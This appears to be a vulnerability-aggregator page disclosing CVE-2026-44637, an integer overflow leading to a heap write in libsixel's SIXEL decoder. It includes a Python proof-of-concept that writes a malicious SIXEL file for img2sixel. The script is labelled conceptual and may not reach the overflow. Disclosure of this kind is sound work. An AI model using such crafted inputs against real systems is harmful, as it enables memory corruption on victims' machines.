Security Vulnerability Report
中文
CVE-2026-44637 CVSS 7.1 HIGH

CVE-2026-44637

Published: 2026-05-14 20:17:09
Last Modified: 2026-05-14 21:21:11
Source: [email protected]

Description

libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. From to 1.8.7-r1, a signed integer overflow in the SIXEL parser's image-buffer doubling loop can lead to an out-of-bounds heap write in sixel_decode_raw_impl. context->pos_x grows by repeat_count on every sixel character with no upper bound check. Once pos_x approaches INT_MAX, the expression "pos_x + repeat_count" used to size the image buffer overflows signed int. Depending on how the overflow wraps, the resize check that should reject oversized buffers can be bypassed, after which a subsequent write computes a large attacker-influenced offset into image->data and writes past the allocation. Reachable from any caller that decodes attacker-supplied SIXEL data, including img2sixel. This vulnerability is fixed in 1.8.7-r2.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

libsixel <= 1.8.7-r1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys # Conceptual PoC for CVE-2026-44637 # Generates a malicious SIXEL string to trigger integer overflow def generate_malicious_sixel(): # SIXEL escape sequence header payload = b"\x1BPq" # Character to repeat (SIXEL pixel) repeat_char = b'?' # A large repeat count to push pos_x towards INT_MAX # In a real exploit, this would be tuned to hit the exact overflow boundary large_count = 10000 segment = b"!" + str(large_count).encode() + repeat_char # Repeat the segment many times to simulate unbounded growth # The parser loops over these, adding repeat_count to pos_x each time payload += segment * 100000 # SIXEL terminator payload += b"\x1B\\" return payload if __name__ == "__main__": filename = "exploit_sixel.bin" with open(filename, "wb") as f: f.write(generate_malicious_sixel()) print(f"[+] Generated malicious file: {filename}") print(f"[+] Usage: img2sixel {filename}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44637", "sourceIdentifier": "[email protected]", "published": "2026-05-14T20:17:08.847", "lastModified": "2026-05-14T21:21:10.620", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. From to 1.8.7-r1, a signed integer overflow in the SIXEL parser's image-buffer doubling loop can lead to an out-of-bounds heap write in sixel_decode_raw_impl. context->pos_x grows by repeat_count on every sixel character with no upper bound check. Once pos_x approaches INT_MAX, the expression \"pos_x + repeat_count\" used to size the image buffer overflows signed int. Depending on how the overflow wraps, the resize check that should reject oversized buffers can be bypassed, after which a subsequent write computes a large attacker-influenced offset into image->data and writes past the allocation. Reachable from any caller that decodes attacker-supplied SIXEL data, including img2sixel. This vulnerability is fixed in 1.8.7-r2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://github.com/saitoha/libsixel/security/advisories/GHSA-9jm7-77gr-qghv", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.